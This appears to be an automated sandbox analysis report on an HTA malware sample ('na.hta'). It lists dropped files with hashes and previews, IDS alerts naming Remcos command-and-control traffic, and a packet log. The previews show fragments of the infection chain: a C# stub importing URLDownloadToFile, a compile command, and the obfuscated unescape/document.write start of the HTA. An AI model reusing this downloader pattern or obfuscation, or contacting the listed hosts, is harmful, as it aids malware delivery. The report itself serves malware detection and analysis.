File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 195824
Entropy (8bit): 3.733217557919086
Encrypted: false
SSDEEP: 3072:asQ4xYsrlTzTSTB3SJrS5GhHLgt5pxGwUAu6zUhYpt0nb2PRJ7oWdHIx:GUYsrlTyN3IS52lwt0nM5U
MD5: 5A71149A9C997CDCB94F1A84860417F7
SHA1: 9D80F853425AE99D844A70CEBAA59AEE73C537D1
SHA-256: FF6B47D315645FDDC632876AE60A1A33A3E9138CEEF8A073D2FE8779208F7D8C
SHA-512: 448D914AA714C3DEAB84218BEDA6A3E94A9A5B8A5D912178F72A2EA82C73AD6DDB86A8E3443785FDCE8D9FD876C5DF7C26CD878DFA33F432E38AD62FF0E91C1B
Malicious: false
Preview: ..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .a.l.m.e.c.e.g.u.e.i.r.a.(.f.l.u.c.t.u.a.d.o.r.,. .d.e.s.v.a.r.i.a.r.,. .m.i.l.i.c.i.a.n.o.,. .m.o.a.n.s.a.,. .h.e.m.i.a.t.r.o.p.h.i.a.)..... . . . .d.i.m. .f.i.l.t.e.r..... . . . .d.i.m. .d.i.a.l.e.c.t..... . . . .d.i.m. .e..... . . . .d.i.m. .r.e.s..... . . . .d.i.m. .f.o.r.m.a.t.t.e.d.T.e.x.t..... . . . .d.i.m. .f.l.a.g.s..... . . . ..... . . . .f.l.a.g.s. .=. .0..... . . . . ..... . . . .i.f. .m.i.l.i.c.i.a.n.o...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.F.I.L.T.E.R.). .t.h.e.n..... . . . . . . . .f.i.l.t.e.r. .=. .m.i.l.i.c.i.a.n.o...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.F.I.L.T.E.R.)..... . . . . . . . .d.i.a.l.e.c.t. .=. .U.R.I._.W.Q.L._.D.I.A.L.E.C.T..... . . . .e.n.d. .i.f..... . . . ..... . . . .i.f. .m.i.l.i.c.i.a.n.o...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.D.I.A.L.E.C.T.). .t.h.e.n..... . . . . . . . .d.i.a.l.e.c.t. .=. .m.i.l.i.c.i.a.n.o...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.D.I.A.L.E.C.T.)..... . . . .e.n.d. .i.f..... . . . ..... . . . .I.f. .L.C.

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1628158735648508
Encrypted: false
SSDEEP: 3:Nlllul6/l/z:NllU6t/
MD5: D5FB08C0907CE5EF0FBA9194CE138AEE
SHA1: 3CD0149D806186D955985F25EEC91BB95AB3BD47
SHA-256: FB7F816D549701FEEB83DF1309A7D8193FFB3F5809119DADB385B3E697113DB3
SHA-512: A2F6A7DCC981F7BD5490B6C07BF7CC7EC5D2FC377380E628B95AB1627FEC53F6994AB32315E22A39DD337300FC83512C9029C15910E7ED570612C5798EF27145
Malicious: false
Preview: @...e.................................F..............@..........

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type: Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Mon Oct 14 11:23:41 2024, 1st section name ".debug$S"
Category: dropped
Size (bytes): 1336
Entropy (8bit): 3.9821609051742612
Encrypted: false
SSDEEP: 24:HHm9plAtgpHOwKTFexmfwI+ycuZhNdSlYakS0SlNPNnqSSd:SlAtYNKTAxmo1ulIGa35FqSC
MD5: F9CB5E3EFFED4E562A6579E52C8D28E3
SHA1: 444F6ADC7322C3CAF7FF324D62354E129A7E8EA4
SHA-256: F3A142E1848C74319F1BC06E1F4E14A78501E599A1918732828B04EB20105F32
                                                              SHA-512:FE8A26973E5A147D25B14A1DBFCAD3CB9854DE275E2868D63725F91241AB9853300221EED67855F1EB552AB075A6F5B240AF63BF9E85BC749E68DF17E1B4B6DE
                                                              Malicious:false
                                                              Preview:L...=..g.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\p44lx5ym\CSC1BDFD807A6FD4EDC87F258A79D1E57AA.TMP......................`.=C.Kq.e-[W..........5.......C:\Users\user\AppData\Local\Temp\RESC057.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.4.4.l.x.5.y.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb20b6b62, page size 32768, DirtyShutdown, Windows version 10.0
                                                              Category:dropped
                                                              Size (bytes):15728640
                                                              Entropy (8bit):0.10106922760070924
                                                              Encrypted:false
                                                              SSDEEP:1536:WSB2jpSB2jFSjlK/yw/ZweshzbOlqVqLesThEjv7veszO/Zk0P1EX:Wa6akUueqaeP6W
                                                              MD5:8474A17101F6B908E85D4EF5495DEF3C
                                                              SHA1:7B9993C39B3879C85BF4F343E907B9EBBDB8D30F
                                                              SHA-256:56CC6547BDF75FA8CA4AF11433A7CAE673C8D1DF0DE51DBEEB19EF3B1D844A2A
                                                              SHA-512:056D7FBFB21BFE87642D57275DD07DFD0DAE21D53A7CA7D748D4E89F199B3C212B4D6F5C4923BE156528556516AA8B4D44C6FC4D5287268C6AD5657FE5FEC7A0
                                                              Malicious:false
                                                              Preview:..kb... ...................':...{........................R.....)....{.......{3.h.T.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...........................................{3....................k.....{3..........................#......h.T.....................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):2
                                                              Entropy (8bit):1.0
                                                              Encrypted:false
                                                              SSDEEP:3:Qn:Qn
                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                              Malicious:false
                                                              Preview:..
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                              File Type:MSVC .res
                                                              Category:dropped
                                                              Size (bytes):652
                                                              Entropy (8bit):3.101570989095812
                                                              Encrypted:false
                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grynSlYak7Ynqq0SlNPN5Dlq5J:+RI+ycuZhNdSlYakS0SlNPNnqX
                                                              MD5:19B37F9260853D43134B71F1652D5B57
                                                              SHA1:4F26C0ECE1513EDC38D1E6E1F327F79922289F11
                                                              SHA-256:DEA1F12028C4F8C85DF54BB1D95561D54E73F59F1FECF78CD42B0931BB56D313
                                                              SHA-512:6C7EFB6418561ACC02BD7CA268A4FF7630AD427CEE25E4F5EFE65202EE3CA47D80B3C16E560778B7C12F0B628D35FF05DDA779107DC488E36B89BAD799B17E57
                                                              Malicious:false
                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.4.4.l.x.5.y.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.4.4.l.x.5.y.m...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (352)
                                                              Category:dropped
                                                              Size (bytes):475
                                                              Entropy (8bit):3.8343091223020105
                                                              Encrypted:false
                                                              SSDEEP:6:V/DsYLDS81zuTocE05NVMGpJ/RQXReKJ8SRHy4HnHy7mLmW8jvwy:V/DTLDfuToXSJ8XfHmc8jvwy
                                                              MD5:CF949A7E29735AD6B8A09C0CC0BEAE97
                                                              SHA1:DC92E9E10F38AEAB463C00E9D75C8DBF2079C789
                                                              SHA-256:445F4CADD6D07292E03D69E62FAC1AB63AD9E3AC760E46D367BEA04A4604B7B4
                                                              SHA-512:29C63C01AED8621DE822517BACFE90130EF54C77A73EDFC2036DF8A1CD182B1F6A4ACFA9742B81F7276A99CF01D98F012A5A8C06F87B4C1620F92D2CCEB36041
                                                              Malicious:false
                                                              Preview:.using System;.using System.Runtime.InteropServices;..namespace oMzzGcMyN.{. public class guMpbbeGdW. {. [DllImport("urlmoN", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr GmfRpUt,string PMdXvN,string Ft,uint axxsiASHf,IntPtr xHWSy);.. }..}.
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):371
                                                              Entropy (8bit):5.229618699662127
                                                              Encrypted:false
                                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923ft0zxs7+AEszI923f3:p37Lvkmb6KzqWZE2P
                                                              MD5:75A17E40A5022CDF841B6B490EC1E4D3
                                                              SHA1:4408AD06DC6DBAFC3B76D228C0FF12AC921A27AA
                                                              SHA-256:4EB84A9CE242DADEBBB8ECF1FFBF2E745E3228155B4E9F27CF46E0FC86CFFAE1
                                                              SHA-512:D879B2A62B1E5F2056C17D3B3C044F84C507D335DF2084ED27612230697B2E101897A9E66D28049DA24F260ED7E324BE3EC60269BDF32CAC3351651D16ACD55F
                                                              Malicious:true
                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.0.cs"
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):3072
                                                              Entropy (8bit):2.840968302990965
                                                              Encrypted:false
                                                              SSDEEP:24:etGSVPBG5eAdF8c/kSyffUQxtkZfP98iMEWI+ycuZhNdSlYakS0SlNPNnq:6WsAdeoyEQ8JP9tMn1ulIGa35Fq
                                                              MD5:5C914F440C02769E93D511B81D69F5E0
                                                              SHA1:046E596B5FCE741E70D76DBC331D18A12EAE5DCE
                                                              SHA-256:D016F5A1F187DA50AB9F0E1AE49CFCD3032C2D55833CDA216591D2E495FD4683
                                                              SHA-512:E0330EF66B11A6353980668A32836C84E31BAE00FB095307028A240E9D994749E7192755A4AF1AE6960398C89442FBC2ED587C446DE4DD33BDED94E5390C0F80
                                                              Malicious:false
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...=..g...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................<.5.....}.....}...........................".............. C.....P ......U.........[.....c.....j.....m.....w...U.....U...!.U.....U.......!.....*.......C.......................................,..........<Module>.p4
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
                                                              Category:modified
                                                              Size (bytes):870
                                                              Entropy (8bit):5.311498744044399
                                                              Encrypted:false
                                                              SSDEEP:24:KMoqd3ka6KzLE22Kax5DqBVKVrdFAMBJTH:doika6aLE22K2DcVKdBJj
                                                              MD5:BB1B0C743FFACF6FDB7EB58086B1CE99
                                                              SHA1:993B5A89B4FA21DE3267A480098B60903D2E7897
                                                              SHA-256:6B73481223FD581B35B080542EC796E48467C2B91C10A91FD2434E8ED1710CDA
                                                              SHA-512:D5FFD39EB3C55D1A10B52421C28EC8DA471AB853A80CB51D268CB6C68C286C966B5AB1371C9B9BB511ED27908A2B34B57858902C9EE3689FD8C7E5E30E714473
                                                              Malicious:false
                                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):195824
                                                              Entropy (8bit):3.733217557919086
                                                              Encrypted:false
                                                              SSDEEP:3072:asQ4xYsrlTzTSTB3SJrS5GhHLgt5pxGwUAu6zUhYpt0nb2PRJ7oWdHIx:GUYsrlTyN3IS52lwt0nM5U
                                                              MD5:5A71149A9C997CDCB94F1A84860417F7
                                                              SHA1:9D80F853425AE99D844A70CEBAA59AEE73C537D1
                                                              SHA-256:FF6B47D315645FDDC632876AE60A1A33A3E9138CEEF8A073D2FE8779208F7D8C
                                                              SHA-512:448D914AA714C3DEAB84218BEDA6A3E94A9A5B8A5D912178F72A2EA82C73AD6DDB86A8E3443785FDCE8D9FD876C5DF7C26CD878DFA33F432E38AD62FF0E91C1B
                                                              Malicious:true
                                                              Preview (decoded from UTF-16 LE; the original extraction showed a null byte as "." between characters):
                                                              private function almecegueira(fluctuador, desvariar, miliciano, moansa, hemiatrophia)
                                                                  dim filter
                                                                  dim dialect
                                                                  dim e
                                                                  dim res
                                                                  dim formattedText
                                                                  dim flags

                                                                  flags = 0

                                                                  if miliciano.ArgumentExists(NPARA_FILTER) then
                                                                      filter = miliciano.Argument(NPARA_FILTER)
                                                                      dialect = URI_WQL_DIALECT
                                                                  end if

                                                                  if miliciano.ArgumentExists(NPARA_DIALECT) then
                                                                      dialect = miliciano.Argument(NPARA_DIALECT)
                                                                  end if

                                                                  If LC
                                                              File type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                                              Entropy (8bit):2.3094679199096855
                                                              TrID:
                                                              • HTML Application (8008/1) 100.00%
                                                              File name:na.hta
                                                              File size:167'898 bytes
                                                              MD5:52bb72daa6c16c09d4298bd59e12b7d9
                                                              SHA1:2e4aef7df584acaadb5a6e555d6e2f40ae12b6f1
                                                              SHA256:8fbf6165b0751a47bf9842011e82c4a7715cc879fd7272b45ab549df6e813e46
                                                              SHA512:1a6a1c54ceed1d004e32504bb473d2525dcff1974d8618af871252e4da7f3992ca87acc935a74f78cd6c14f172142ccfeee9bcb47104ea50a704fe37750d4ee4
                                                              SSDEEP:48:7oa+awjz7eWLB23EfAq6kfAKV6/HQ2UBW1++izpyHBfHLPy3JofufAYfAkhjQ/od:Ea+n7QbzVsdi9yOPtksVKLSAT
                                                              TLSH:C9F32796EA3148C8B7DC9E93BEFC738C3578931FA2CA5EA1939B7452DC2434C918481C
                                                              File Content Preview:<script>.. ..document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253Cscript%252520language%25253DJavaScript%25253Em%25253D%252527%2525253C%25252521DOCTYPE%25252520h
                                                              Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                              2024-10-14T11:36:13.042897+0200 | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | 1 | 185.199.111.133 | 443 | 192.168.2.5 | 49707 | TCP
                                                              2024-10-14T11:36:13.997130+0200 | 2020423 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 | 1 | 192.3.220.40 | 80 | 192.168.2.5 | 49708 | TCP
                                                              2024-10-14T11:36:13.997130+0200 | 2020425 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 | 1 | 192.3.220.40 | 80 | 192.168.2.5 | 49708 | TCP
                                                              2024-10-14T11:36:15.871804+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49714 | 135.148.195.248 | 6875 | TCP
                                                              2024-10-14T11:36:16.762466+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49722 | 135.148.195.248 | 6875 | TCP
                                                              2024-10-14T11:36:16.900244+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.5 | 49723 | 178.237.33.50 | 80 | TCP
                                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                              Oct 14, 2024 11:36:02.121298075 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.121298075 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.121418953 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.121454000 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.121607065 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.121992111 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.122067928 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.122075081 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.122102976 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.122159958 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.122159958 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.122226000 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.122258902 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.122308016 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.122308016 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.122807980 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.122881889 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.122916937 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.122934103 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.123157978 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.123235941 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.123244047 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.123317957 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.123490095 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.123542070 CEST4970680192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:02.123619080 CEST8049706192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:02.123652935 CEST8049706192.3.220.40192.168.2.5
